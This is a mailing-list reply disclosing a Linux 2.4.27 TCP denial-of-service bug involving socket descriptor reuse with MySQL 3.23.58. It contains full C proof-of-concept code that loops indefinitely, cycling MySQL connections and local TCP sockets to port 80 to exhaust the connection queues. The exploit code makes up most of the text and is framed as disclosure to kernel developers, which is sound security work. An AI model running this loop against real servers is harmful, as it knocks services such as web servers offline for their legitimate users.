RE: Linux 2.4.27 SECURITY BUG - TCP Local (probable Remote) Denial of Service

Hi David,

Hmm.. I was more looking for the correct kernel developer to send
it to, rather then just releasing exploit code into the wild, and
having it end up a zero day hack. It was not in any way my intention
to waste anyone's time. I will however, comply with your politely
stated request :)

As for it being an application bug - it may be one in Mysql not
closing the sockets, but it is a Kernel Bug that allows CLOSE_WAIT
sockets to clog up the connection queues, and cause a DOS conditions
on other applications (such as Apache). Since most software used for
denial of service is badly written (intentionally) to exploit the
holes, the error should be fixed, not blamed on faulty software.

That being said - below is a the proper description, and the code
used to exploit it. Hope it helps. This version is not the one
which invokes the CLOSE_WAIT state, but rather the TIME_WAIT one,
I am not able to publish the source code for the CLOSE_WAIT bug.
The log however clearly shows that a mysql descriptor is closed,
and then used immediately again by the socket call, which causes it
never to end up getting closed. Linux apparently has either no
timeout for CLOSE_WAIT, or it's a very very long one.. Either way
is a bad thing.

D.

Description
=============
The "socket" call will reuse file descriptor before it is completely
finished closing. In this case, it is Mysql (3.23.58) which doesn't
appear to close them right away, and thus you end up with the
result I mentioned.

Proof Of Concept Code:
======================
#include <sys/types.h>
#include <time.h>
#include <sys/stat.h>
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <time.h>
#include <string>
#include <fcntl.h>
#include <signal.h>
#include <stdarg.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <sys/time.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <netdb.h>
#include "mysql.h"

int main (int argc, char **argv)
{

char *sql_host = "127.0.0.1";
char *sql_name = "root";
char *sql_pass = "<PASS>";
char *sql_socket = NULL;
int sql_port = <PORT>;
char *c_host = "127.0.0.1";
int c_port=80;
long sock=0;
int connectresult=0;
struct sockaddr_in sockaddr;
MYSQL mysql;
MYSQL mysql2;

mysql_init(&mysql);
mysql_init(&mysql2);

if (!mysql_real_connect (&mysql2, sql_host, sql_name,
sql_pass,NULL,sql_port,sql_socket,0))
    {
      printf ("SQL-ERROR connecting to database: %s",
               mysql_error (&mysql));
      exit(1);
    }

printf("Mysql Socket Connected: %d\n",mysql.net.fd);

while(1)
{

/* Close the SQL connection */
mysql_close(&mysql);

mysql_init(&mysql);
if (!mysql_real_connect (&mysql, sql_host, sql_name,
sql_pass,NULL,sql_port,sql_socket,0))
    {
      printf ("SQL-ERROR connecting to database: %s",
               mysql_error (&mysql));
      exit(1);
    }

printf("Mysql Socket Connected: %d\n",mysql.net.fd);

sockaddr.sin_addr.s_addr=inet_addr(c_host);
sockaddr.sin_port=htons(c_port);

  if((sock=socket(AF_INET, SOCK_STREAM, 0))<0)
    printf("socket failed.");

sockaddr.sin_family=AF_INET;

printf("Connecting to %s:%d (FD: %ld)... ",c_host,c_port,sock);
connectresult=connect(sock,(struct sockaddr *) &sockaddr, sizeof(sockaddr));

if(connectresult) {
   close(sock);

     switch(errno) {
       case ECONNREFUSED:
         printf(" CONNECTION REFUSED.\n");
         break;
       case ENETUNREACH:
         printf(" HOST UNREACHABLE.\n");
         break;
       default:
         printf(" FAILED: UNKNOWN ERROR");
     }
}
else
{
printf(" Connected.\n");
}

mysql_close(&mysql2);

/* Make a Mysql Connection */
mysql_init(&mysql2);
if (!mysql_real_connect (&mysql2, sql_host, sql_name,
sql_pass,NULL,sql_port,sql_socket,0))
    {
      printf ("SQL-ERROR connecting to database: %s",
               mysql_error (&mysql2));
      exit(1);
    }

printf("Mysql Socket Connected: %d\n",mysql2.net.fd);

/* Close the socket connection */
printf("Closing socket #%ld",sock);
close(sock);
}